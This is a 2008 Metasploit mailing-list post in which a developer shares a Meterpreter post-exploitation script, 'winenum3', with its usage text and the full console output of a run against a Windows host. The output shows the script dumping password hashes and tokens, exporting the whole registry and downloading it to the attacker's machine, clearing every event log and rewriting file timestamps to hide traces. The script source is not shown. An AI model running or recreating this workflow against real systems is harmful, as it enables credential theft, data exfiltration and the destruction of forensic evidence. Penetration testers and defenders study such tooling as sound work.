Metasploit mailing list archives
Fwd: Script for automating Information Gathering in windows Hosts
From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Sun, 14 Dec 2008 22:25:40 -0400
Forgot to include the rest of the mailing list on the email ---------- Forwarded message ---------- From: Carlos Perez <carlos_perez at darkoperator.com> Date: Sun, Dec 14, 2008 at 10:24 PM Subject: Re: [framework] Script for automating Information Gathering in windows Hosts To: natron <natron at invisibledenizen.org> Natron I decided that the changes where easy so I took a couple of minutes and made the changes here is the result. Now I only have to work on getting the exit command to not bring the error message. You are given credit in the comments and on the functions of the code I just copy pasted. What do you think? meterpreter > run winenum3 -h Windows Local Enumerion Meterpreter Script by Darkoperator Carlos Perez carlos_perez at darkoperator.com Usage: -h This help message. -m Migrates the Meterpreter Session from it current process to a new one -c Changes Access Time, Modified Time and Created Time of executables that where run on the target machine and clear the EventLog -r Dumps, compresses and download entire Registry [-] Error while running command run: exit meterpreter > run winenum3 -m -c -r [*] Launching hidden cmd.exe... [*] Process 2676 created. [*] Current process is cmd.exe (3740). Migrating to 2676. [*] Migration completed successfully. [*] New server process: cmd.exe (2676) [*] Running Windows Local Enumerion Meterpreter Script by Darkoperator [*] New session on 192.168.1.147:1050... [*] Saving report to /tmp/192.168.1.147_20081214.173710156 [*] Checking if WIN2K301 is a Virtual Machine ........ [*] This is a VMware Workstation/Fusion Virtual Machine [*] This is a VMWare virtual Machine [*] Running Command List ... [*] running command cmd.exe /c set [*] running command arp -a [*] running command ipconfig /all [*] running command ipconfig /displaydns [*] running command route print [*] running command net view [*] running command netstat -na [*] running command netstat -ns [*] running command net share [*] running command net group [*] running command net user [*] running command net localgroup [*] running command net view /domain [*] running command netsh firewall show config [*] running command tasklist /svc [*] Running WMIC Commands .... [*] running command wimic computersystem list [*] running command wimic useraccount list [*] running command wimic group [*] running command wimic service list brief [*] running command wimic volume list brief [*] running command wimic process list brief [*] running command wimic startup list full [*] running command wimic qfe [*] Dumping password hashes... [*] Hashes Dumped [*] Getting Tokens... [*] All tokens have been processed [*] Dumping and Downloading the Registry [*] Exporting HKCU [*] Compressing HKCU into cab file for faster download [*] Exporting HKLM [*] Compressing HKLM into cab file for faster download [*] Exporting HKCC [*] Compressing HKCC into cab file for faster download [*] Exporting HKCR [*] Compressing HKCR into cab file for faster download [*] Exporting HKU [*] Compressing HKU into cab file for faster download [*] Downloading HKCU.cab to -> /tmp/192.168.1.147-HKCU.cab [*] Downloading HKLM.cab to -> /tmp/192.168.1.147-HKLM.cab [*] Downloading HKCC.cab to -> /tmp/192.168.1.147-HKCC.cab [*] Downloading HKCR.cab to -> /tmp/192.168.1.147-HKCR.cab [*] Downloading HKU.cab to -> /tmp/192.168.1.147-HKU.cab [*] Deleting left over files 1 [*] Clearing Event Logs, this will leave and event 517 [*] Clearing the security Event Log [*] Clearing the system Event Log [*] Clearing the application Event Log [*] Clearing the directory service Event Log [*] Clearing the dns server Event Log [*] Clearing the file replication service Event Log [*] Alll Event Logs have been cleared [*] Changing Access Time, Modified Time and Created Time of Files Used [*] Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\reg.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\route.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\net.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe [*] Done! meterpreter > -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081214/4e4cf686/attachment.htm> -------------- next part -------------- A non-text attachment was scrubbed... Name: winenum3.rb Type: application/x-ruby Size: 13002 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081214/4e4cf686/attachment.rb>
Current thread:
- Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 14)
- Message not available
- Message not available
- Message not available
- Message not available
- Message not available
- Fwd: Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 14)
- Message not available
- Message not available
- Message not available
- Fwd: Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 14)
- Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 22)